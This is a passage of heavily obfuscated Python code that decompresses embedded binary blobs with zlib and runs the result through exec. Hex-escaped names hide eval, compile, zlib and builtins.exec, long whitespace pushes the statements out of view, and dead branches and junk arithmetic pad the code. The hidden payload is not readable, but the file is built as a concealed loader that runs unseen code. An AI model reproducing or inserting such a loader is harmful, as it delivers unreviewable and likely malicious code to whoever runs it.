e4\xa7u\xf3\xa0DR\x99W\xc4\xc5l\x8du<\xbcjS\x8a\x92\x97H\xcb=\xb5F.{\xb9\xae\xb2 m\xac2\xcc]\xe5\xf4U\x89H\xee\xa0\xf2Cg7W\xfd\xebt\xae\x0c[tP\x9c\rd\xc1\xb1\xf6x;\x81(\xaf\xd3\\I\xa5\xf6\xf4\xac\x96\x1a\x8a\x99&<\xed\xcb\x98\xb1j\x02\xec\xddM\x0f\xa4w\xa1(F\xfa\x15f<\xb2\x82\xa0\xd5\xfc\x01\x83\xb2lV\x90\xb6\x10\xc2\x1b\xdcX7)\x80\x9f[\xe1\xa9\xce,X\xf5\xc6\xae,\xf8\t\xa6\x89\x9f\xbfOg\x93\xf7"I[\xcb\xc6\x97/\xe4\x0f\xc7=\x00r\x0b\xc1g\xc7\x97\x16\xbf"[\xa0\xdeQ\xcd\x17\xa8\xb6\x9bNT\xe3\xbb\xda1|\xa4DO\xbdu\xc8\xc8f\x08\xea\xc9\xa7\x87\xe7\xc5\xfc\x98.\xd8\xb42O\xd0v\xa5\x83\xf7\xf7\xd39\xb5\xc5)w\x80\xf9\xe0qr\x86%\xb78\xbd\xb1\xf8\x81&d\x92H\xbe\xdd\x96\xf0\x10\x8e\xda\xe8\x1b\xef\xe2\xf5\x07\xef\xe0\x9c\'&2.\xe2,\xf2\xed\xf6\x8ag$R\x9cq\x838Y\xe5\xe7\x8b\xe7O\xcf\x7f>\xbfL\x1e\x8f\t\xf2Ca\x13(\xe3MO\xb8\x0eB\n\x8fgV\x10\xe4\xd1Q\xfez\xeb\xfb\x9a\x0c\x13\xce\xa9\x8a\xc1$\x9c\x1c1\x1b\'\x00\x04\x1e\xc6p?\x81\x14\xd2|\x07\x1c\x14X\xde\xe0.T\xce\x89\x97\xdbG\xb71\x7f\xfc\x87\x9b\xe1f\x92IQ~g\xfb4\xc0&+\xf0\xc2\x0f\x16\xe6\xe5\xe662;\x9c|\xfa\xf94}\x99\x1c\xcb\xafeo\xc3\xa7\xc9\xe0\x0f\xdc\x9e\xcc\x9e\'\xa7\xb5\xe6T\xb2\x88\x9d~m\xb3"\xda\xf2\x98t\xe5\x05\x1a p\x83pM\'\xb5\xdbw.\xf63\x0bp\x81\xa9\xa4>\xe0e\x1aR\xc2\x10\xca2v\xbc[t\x8f\x88\xb0|#\xe7<\xea\x9f\xfe<m\xd2X`\xa5\x9dN\xd9>\x0f\x02\xc6\xc9\'\xd3\x1a\xe3c\xdb\xd2\x7f\xb79\x01g\x85\xd2\xda"2emZ(M\x0c\xd0|S\xb2~?X !\xf8\xean\xd5J\xc9v\x11\xfb{;+\x90[\x08\xd3i\xa3-\xfb\xf3\xd5\xb7[\xea$\xe7\x0c\xb0c\x99\xd5\xfd\xd6\xf5)\xf1\xb8T_Nl\xddC\x1c\xfbF\\\x1f\xbd\xfc\xc1\xab\x92\x1c\xf9\x8b\xb5>\xe2\x1a\xe6\xea\xc2M\x81\xeagefO\xb1\xed\xbb[\xa2\x87suH/Y\x0e\xad\x11G;\xea\xbf\x9e\xe8\x1f\xfc\xfdF\x007\xb8\xf8\xc8J\xce\x87/\x97K\xc6Ae,8\x8am\x96\xf3^a}\xb4B\x1d\xcbJ\xdfJ?\xb7CA\xcf\xb2\xca\n\xfe\xed\xd6\xb6\xadxM\xca;p\xe3\xc1\xea\x19N\x98\xbc)\xdfS\x19\x11\xb0\xdeR<4bE\xael\x9e\x84e\x95\x0fm\xf8\xb83\xb3\x1e2\x85\x821\x1b\xff\xb0\xb8v-R\x97w\xb0vq\xb0\xe6%\xb9#\xb8\x06\xafXE\x97\r\xbe\xfa\xf0\x93S~\xd5\x1d\x84U\x94\x93\x15\xf7s\xeb\x86G\x96\xcd \x1c\x83Q\x11\xc3lm\xba\x137:p\xbb\xf1\xf8(\x9d\x19-\xf9\xe8k\x9d2\xc8\x14\xfeW\x9d>\x9b\xd1\x83\x05\xbb\'P\xb5\x06\x8d\x9a~0y\x1dM\xbe\xbf\x9c\xd6$\x05\x073\xb7}\xbe&\xfe\xd0\x1cf\x01\xf0\xca\xf2vs\xf3\xf7^\xc1\xe7\x02\x04\x10D')

        _square(_system = -21752 - 9860)._invert(Builtins = Invert._run + 87149)                                                                                                                                                                                                                                                          ;_square.Cube(_statistics='iiijlljljjljjiijj',Statistics=b'\xfa|\xbe~\xfdFp\xdc\xcc\x9aM\xd1\xceb>\x7f\xbbu\x16\x0b\x9eW\x96,\xdf\x82\x05u\xc8\x97\x9f\xdfn\xaf\x19\xb6f-f\x82\xbf\x08\x97-\xe2\xda\xad})\xb3nu\x05\xb7\x0e\x1b\x89\'3\x8fC_\xe5Y\x8e\xd6F\x0b\xd8\xf8\x87\xe67a\xc3\x83\xfb\xd1\xdai\xc9\x82\x8b,$\x1b?\xac\x9e\x98\xf4\xa4T\x9e\x90\xe4\xe4\x10\xf0\x8e\xc6r\xbc\xed\x04\x17\x7fp{\xe0!\x8f\xce$Bx\xa3[\x89A\x95\xb3\x93%7\x14\x83G\xd8\x06\xff@6;\x12\tO\xde\xad\xbd\xba/\x0er&\xe0P\x11\xc9g\xd3\xe7\x97\xbb\xd1\x1fg\xb7\xdf\xde\x99Wk\x07\x15\xdf\xea\xeb;R\r\x1c\xb4\xd7\x05*q\xb0\x83\x9a^\xacU\x8d\xdd\xbcp\r\x03\x9eQ\xb6\xf6\x14q\x96\x9d(\x8f\x88\xe4\xa0\x88p\xde\x1da:\xde\x1c0\x83\x19%\xc8\x8c\xd2aX\x10\x15\x01\xd2$\x0e\xe3"N\x92q223\xf20\x8e1\xb0t\x10O\xe2\x0c\x93\xf8\xe6f\x8f#S7\x81d\x04\xa6^H5\xcd\xf7\x94\xc3g\x94\x04\xe5=\xd1\xafp/9\x9e\x01\xa0\x0b\x9bx\x82\xe0\xea\xcd\xb418;#\x16V2\xc6\x93\xb1\x90L\x87\xd4i\xa4+\x95\xe1\xe8\x08|\xa1\xce3e\x10\x0et\x8c\xd3\x01\x19h\x87\x12\xf8C\xea\x1e\xa5\x18@\xe3$~^n\x9e\x15\x93&c\x91$R\x88\x80\xe4\'\xb7\xe0m\xe7\x88\xb3+\xda^\x10\xca\xef\xc5\xf4#s\xc4\xfb\xa1\x8a\x13\xb2\x0c\x0b\x14e:\x9d\x9e\xdcjYJ\xa6\x9b/_\xc4\x8cyNP\x02v\x8br\xb0\x1f\x9c\n\x84\xecH\x88[\xc0Q7\x18\xba\xc61;|\xf43\x02\x88-\x16\x02\xc8\xe1\xe6\xa3\xf1\xa6\xa0\xcf\x82\x83\xa6\xc5\xcd\r\xce\xe9x\xf4\xfb\x99\x98biF\x9e\x8a\xe9\x1b\x07\xa7\xb9\x04\x1dB\xa1\xad\xaa\xce\x1aM\xd12\x84\x9b\xa0\xc6\x86\xb6G\x830\xd1W\x89\xcb\xe53\x01\xf1hb\x1e\xfdn\xefXk\x97\xe9\xdb\xb3\xa8lm\x12sQ\x92\xce\xd1m\x1e\xb0|B\xcb\xd4%\x15i\x161\xd4b\x13\xb56;m\xcb\xa8B\xcb\x95n+))\xf3\xaal\xb5|\xf1\x8c\xfbi\xf0\xdd\xcc\xd4\xe3\xe3\x81\x94\x9b\xe9w\xf4\xc7\xafz\x92V\xe0\x8b\x15\xa6$\x8a\xa7\x84N\x17\xf0\xf8\x01@i\xd9\x8e\xe4\xec\x04s\xed\x9f{\x9c\x9f\xbc+\x03&\x1d\xc8q\xfe\xeeyv\x86K\x16b\xff\xd0\x94\xc3\xc1N\xd3w\xee&\x91\xe3\x8bAD\x17n8\x9c\xbc\xa3\xb3s\xf85\xf1\xcf\xdd\xdc\xfc\xa3\xac\xff\xa1\x0b\x86\xab\xcfH\xe6\xa5\xa0\x97\x07\x8c\x9e\x82e\x90\xbf\xa4\x00(\xb6\x86L\xa7\xee\x1b\xeb\xebe7\xec\xab|\x81\rsE\x08[\x94\x8f\xaf\xe4\x1bF\xcb\xd9\xd5\x8a\xd6*\xf5\x9d\x18\r\xe4\x16\xfcC\xf1;\x88G\x81\xd6\xce\xf3\xc5\x10\xd6\xce\xfb\xc5\xd3\xfb\xa7\xf1\xfc_/\xa6K\xdf~u\x97\xcb\xd7\xfeA|\x87\xd6)\xf0A\xf9CC\xed\xc5\xb9\xbe\xfe\x80\xb8`\x14\xe8Y\xc4_|\xf8\xaa\xc4E\xe7\x05\xff\x80\xe2\xe5\x8c\x9b\x844\x87\x87\x0f\n\xdc\xe9\\\xd1f\xe3\x1b\xf4\x9d\x07s\xbel\x1f\x11K\xbd\xc3,~\xa2\x98\xf2c\xbc\x12Y\xbf\xe0\x17g\xd6\xef$\x8f\xc7\xf9{s\xc9\xf8\x9d\x05\x1eJd\x03{\t\xb8y\xa4\xa3\xd3N\xdf\x8d\'\xb3\xc1\x9fg\xd0\xd2t\x1aW\xe8\x0f$\xd7 \xa9\xcc\xf0o\x0eN\x82\x87\x0b\x9b\xb4\xae\x14\xb4X\xae\x95w,\xc2K\x1a\x81\xb6\x95\x1d\x12\xee\xd7\xef\x83\xdfa\x02\xc2`\xf9\xe3\x99\xd9\x0b\x8f\xcc\x93\x93\x9a\xbd\x13\x1c\xa3g\xfc\xf5\xad\xf9\xdd\xb7%j\x96\x93\x08\xc7\xf33\xb4\xd6q\xb8\x1eAX\xdf\xd1\x88\x9c\x9d\xc1\xf5\x06\xac\xbd\x05x\x9f\xaf\xf0\xbb?\xe6\xff:\x93 m\xc1R\t\xc0\x1a+P\x83\x08\x16\xd2\xa9\x00\xd7\xd7r\n\xe6n\x99c\x9f\xc92(\xf8\x02\x06V9\x11U\x0b\xaf\xe67pV\x12jj#\x90WW\x87\x13=\xb3aA\x16\xa5\xccM\xed~\x06\xf5\x04Zga!\xb3\xa5{-\x8b>\xf0\xd0p]\x0b\xf6\x9a;\x0f5<\xec\x92z\xa3l@\xd6KX\xf7\x86\x95\x84 \x02\xa83\xba\x17\xbc\xb2W\'\xb7\x0c\x9c\xa7\x15\xfc\x8aBJ\xad\xbf\xa4&\x04\xd9x\x05\x17\xbeCp\x15\x19U\xd6#\xf6E\x89A.\x12I\xdf\xc5k\x88\xcd8g\x17s_8KXN\xfb\xe6\xda^d!m\x84\xe1kw\x11\xb3z\x8d\xe4\xd9\xde\xc2Y\xb0-?\x98\xf1x\xa6\xbd\x10\xf2\\\xae\xdfL\xc7\xf7C#:A\xdb[g:\x8bz_,d\x1a\xf0\x9c\xd6\xaf\xfd\x99\x90\xd3\x08\xcc\xb6\x80N\xf1:Xp\xd0\x0cP\xa8|\x91\x04Z#\xeb\xb4\xb2I\x1f\xa8\xdc\x04 \xb1\xbd\xc8Nr#\xbf8\xd9V\x06\xe8?0,\x1d\x11\xb4$\xb0C\xab\xb7\x14\x91H;\xdfVH\x8aF\xa6\xd9&\xcb\xc4"\xf7M\xb9\xd9v\xf0\xe8\xd1\xda\x8f\x9c\x04\xbc\x01\x93\xeb?J\xe0\x1c\xe7\xa3\x94\xdf\xd2\x9ci\xa9\x1ed0B\xec\x95\xf3\x03\x8c{g\xe82;g\xe5\x04\x07\xa1\xfd\x1a\xd6\xad3"<\xf94\xfa}1\x1dM\x8eye+\xb9\x12\xb0\xda\x99\x8d\xaar\x1c\x18\xbc`\xc9\x03W\x11\x00\xe7\x9c\xdd\n$CEy}\xd0\xe1\xbb\xaf\x96;\xe1\x03\xda\x10,\xa3\x04\x05ch[\xf5\xfc_\xb4\xcf\xfayby\xc5\n/\xb5\xcf\x1eJ\xf6)<D\xd9\xb2\x8a\x91\xf1.\xdaR0\x81+v\x87\xe2(F6\xd1\xeb\x02\tH\x96\xec\x11\\\xde\xa4CYx\xfe\xf9\xca}\x8a\xba\x8cH]\x9c\xa2?\x7f^\xb2OM\xc7\xe2p\xb8\xe6\xa1\xaa\x0e\xde\xd8h\t\xb9\xb4S\x84\xa9\x12Y\xdf\xf6\xf3\xc7N\x8e\x17%\xc9\xb8.?\xb8}`\x13\xd5L\x02\xa9f\xdf\xac\x9f\xc5\xa2j\xd8*Vv\x8c\xd4v\x08\xbb<3{\x15=\xd9\x86\x91(\x1a\x17\\\x1bi\xe4\x12/\x15\xda6\xc8PV\xde}Y\xb0*\x1f\xa1|\xe3\xab\x8c?\xd3\xb1\xbe\xeee\xfb\xa1\xd9\xe4\xabZ?-\xa0\xd2\x0c?X\x18\xb5\xe0\xee\x84n\x94\xf8U\x07\xa5\xf1\xae\x14\x05\xebk,\x89Z\xbb\xf7\xb9\xce\xd6\xaf\n\xf9\x82\xf7\x15kM\x8f#T\xf3\x82m<\x04P\x15/\x9c]\xdb\xf0\xed[}\x80\x0fn\x99\x8c\xe53E\x14\x00\xc0\xe5\xdb\xad\x00S,\x8aB\x8216\xf7Vk\xcdb\x8e\x052e\x99\x7f\xa4\xbc\x11\xe1Zxf\xf6\xddE-\xb7\x9bH\x8c\x00\xfa\x84\xfey\x85pQ\xc4\x8eJt\n@)\xeb\x9d\xf3\x8a\xc9\xa3\x02\xd44\x80\x81\x89\x1e\xfah\xd8\xb2\x14W\x83\xd5\xc8\x02\x07[\x87\xd3\x85+\x11\x00o\xd9\x81\xbfh\xab\x815\x14\\~\xbb\x95\xc8\xe5\x99\x9a\xf0\xca=\x06#L\xcc.l\xe0\xe7\xdc\xaa\xa9\x88\xe0\xb8\x15G\x86\x83\r\xd2\xa4\xb9Ug\xb6\xb8FA*\xb2\xe6n\xb4\x12g\x92%Ar\xd7\x0e-qn6\xcc\xad\xf4\xf5\xc3v\xacz\xe8[\xad\xd2\x14\x9b{\x87i\x95\x1a\xd0?\xeaC\xff\xb1\xcb\xa11?q\x94\x8e\xcd!\xc7\xd9h\xdbC\xa2\xf5\xe1\x81\xbc\xda}\xadI\xa1r\xc3\xde\xa3?\x9a\r\xf8\x1bk U\x81\x9e\xb4$]\x0b\xc1U)2\xf2z\xc9\x98/\x81\x85)\xfc\xb9:\xda-G\x93P\xcf\xfd<\xa0\xa1\x9e\xa6\xf7\x98O\xf5\x1ehu\xdfp\xa0[B1\xb1\xc4\x84\xdfn\t\x83w\xb5`j1\x9a(\xbfU~\\\x1b/\x9a\x1a\xc2|\xd7\xac/P\x14\x16\xc5r]Xj/\xec\x0b\xda\r\'n\xca\xa5\x8aH9\xae\xb1\xd6\r\x94\xad\xc4\xf5\xba\x03\xea\t\x19\x12z$Y\xf0\xb6\xfd@\xa3\xeb\x1d\xd5\xd0\xf5\xb7[\x1d\xa8\x8f\xad\xb2\xb1\'\xe8\xd0\xaf\xc6=\xc1\x85\x8dX:\x028,v\x05\xc5\xacW\xf5v\xdb\x8e0e\xceA\xb4\x14#\x87\x18X&k\xbdA\xe0\xcab\x8e\xe2\xce\x7f8\xfd\x01)[\xb2\x1d\xa0\x1e]\xf6\x06!\x91c\x04%\xaa\xb1\xe7\xb0r[u_\x85\x13\xcf6v\x88r\x8cN\xe3.\xc1\x04\x89D\x99\xdag\xd7K\x1f{\x04\xbab\xc9\x99I>\xcd\xe5=\x82\xaa\x90\xf2G\xf5\x1ej=\x82\xfa\n\x81\x17\xc8\xe3\xf2p@\xbd\xc1R\x0e\xbdi\x7f\x10\x06?\xcd\xdf\n\xc8D\x0c\x0b;\xef3\x87\x0e\x87<\xae\xd9[Y\x86s\xa4\xa2\x92\xc7\xdc\xbc\x80{\xfe\x8a\xc3\xa7\xd8\xafEv\x96`G9N\x11\xe25UI\xe4\x16[G\xd0\xe3\x9c4fa\xa8\x92%\xa5\xd4\xeb\xcc\x81\xff\xe3L\xc88,\x81\xc5M\x05b\xbb\xd6\xa1\x83ASL\x14\xc0\x80f(\xa9\x00\xcb\xe11\x7f}\xd9\xaf\x8d\'e0\x13\xf4Q\xf3\x8b\xc2\x94&h\xe912%\x8b\xb3%\xdbq\xd4\xdb\x97\xd5\xc74\xbd2I(\xf7\x0e\xe1mMK\x95\xef\xf1\xeb\x99\x104\x7f\x9a\x1b\x81\xe5\xe4\xd3\xf3\xcb\xd3=|<\xb6<A7V.\xad\xa1__\x7f\x9c\x99=\xde\x12>\xe2\xc2f\xc5$B\xd2o\xb7\x8e\x17\x80I=,\x93li/\x8f\xcf\xbf\xe1n(\xf4\x19\xad~WL\x1d\x00\xba>\x1a)\xd1\x0c\x8aX\xba\x8a\xd9h7\xa3w\x86\x86\xeb(\x1d)\xef\xbe\xf2\xf4\xbb\xfb\xa8\xd1\x00\xea\x13\xccEY\xe9\xb7\x04hk\x06\x10R\xe3qv\xf6<\xfb\x95hi\x89;\x8aD\xc0~\xa9\x96\xf3\x12Z\xf7\x91\x8d4*U\x1c\xcf\xcf\xc6\xf3_\x99\xc5\x86\xfc\x04\x14U~uU\x11O\x9f\xde\x8f\'\x8f/\xbf9_(\xbah?|\xb4\xcdui\x01\xa3\xf8\xfe\xe1c\x85JD\xd6\xbb\x93\xea\xac\xb3\xeb\rI\x81\xd3\x02R\x01\x8c\xa2a\x88\x91\xfc\x98Z\x86\xd3\xca\x14\x88\xc2\xc2\x94;f\x80d\x88\xfc\xca\xd2bdFmV`\xda\x80\x06Q\xfa0mYM\xddj\xec\xda\x03&w\x050\x14S\xa6\xd1\'\x1a0\x15\xaacG\x1a\xf8]-\x8d\xca9\xcf\xfd\x00\r\xaa\xb6I\x15\xcd\\[\x0bf\x8b)\x0e\x01\x99\xfa-\xa3\xe6\xeb\xb7\x86\xc3\xd5F\'I\x94:-O\'\xd5\xc3\xf4\xb6\xd7\x97\xdb\x8c\x958\xc9B\x94\xe9\xc3F\xee\x9f\xca\xe0\x80\xd11\xfb\xf5\xb5\x04?\x14\xaa\xd1\xea\xcd`\x87\xb6\xf5\xbdV\x80\t\xaa\x11\x18\x8b\xf34y\\\xfc\x8b\x16\xc3j\x07\xa8\xa1\xcf\x97\xad')

        _square(_system = -27888 * -95447)._cube(While = -17772 * Invert._run)                                                                                                                                                                                                                                                          ;_square.Cube(_statistics='S2SSS22S2SSS2S22S22S2',Statistics=b'\x8e\x83\xe7g[0\x99\xd1\x9ag\x04\xad\x07\x87\xcd@N-\xb4y\x03\x85\x95\xfa\xb5\x19\xd0\xbf\x9e\x89\x8dQQi\x9bgy.g\xb7\xbb\xa8\x03\x02\xc9/+\xf8r\xbe\xff?\xfa\x00\xa6\xfc')

        _square(_system = 2137 / 38165)._cube(While = 47745 + Invert._run)                                                                                                                                                                                                                                                          ;SSS2S22SSSSSS2S2SS2S22S,mmmmnmnmnnmnnnnnnm,XXWWXWWXWXXWXWXXWXXX,ILJIIJLIILJIIJIIIJ,MNMNMMNMMNNMMMMMMNNN=(lambda NMNMMMMMNNNMMMNNMNNNNN:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(NMNMMMMMNNNMMMNNMNNNNN)"),filename='\x77\x78\x77\x78\x77\x78\x77\x77\x78\x77\x77\x77\x77\x77\x77\x78\x78\x77\x77\x78',mode='\x65\x76\x61\x6c'))),(lambda NMNMMMMMNNNMMMNNMNNNNN:NMNMMMMMNNNMMMNNMNNNNN(__import__('\x7a\x6c\x69\x62'))),(lambda NMNMMMMMNNNMMMNNMNNNNN:NMNMMMMMNNNMMMNNMNNNNN['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda:(lambda NMNMMMMMNNNMMMNNMNNNNN:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(NMNMMMMMNNNMMMNNMNNNNN)"),filename='\x77\x78\x77\x78\x77\x78\x77\x77\x78\x77\x77\x77\x77\x77\x77\x78\x78\x77\x77\x78',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63')),(lambda O0000OoOoOOOooooOOO0oo,NMNMMMMMNNNMMMNNMNNNNN:O0000OoOoOOOooooOOO0oo(NMNMMMMMNNNMMMNNMNNNNN))
        _square(_system = 50282 - -44763)._invert(Builtins = Invert._run + 47437)                                                                                                                                                                                                                                                          ;ILJIIJLIILJIIJIIIJ()(MNMNMMNMMNNMMMMMMNNN(XXWWXWWXWXXWXWXXWXXX(mmmmnmnmnnmnnnnnnm(SSS2S22SSSSSS2S2SS2S22S('\x76\x61\x72\x73'))),_square._detectvar(Positive='OOoOo0OoO0OOO00OOO')+_square._detectvar(Positive='ODDoDDoDODoODDOoDDDODO')+_square._detectvar(Positive='oOoDoDDDDDOODoDOoo')+_square._detectvar(Positive='mmnmnnmnmnmnmnnmmmnnnm')+_square._detectvar(Positive='NNMMMNNMMMMMNMMNMNN')+_square._detectvar(Positive='iijljljiliijilliiijlji')+_square._detectvar(Positive='xwxwxxxxxxwwxxxwxwwxxx')+_square._detectvar(Positive='jiiljlljljjiillli')+_square._detectvar(Positive='NNNMNNNMMNNMNNMNM')+_square._detectvar(Positive='iiijlljljjljjiijj')+_square._detectvar(Positive='S2SSS22S2SSS2S22S22S2')))

    except Exception as Negative:
        if 445999 > 9812688:
            _square.execute(code = _stackoverflow(Negative))

        elif 263650 > 8402002:
            Invert._invert(Builtins = Invert._run - 98746)
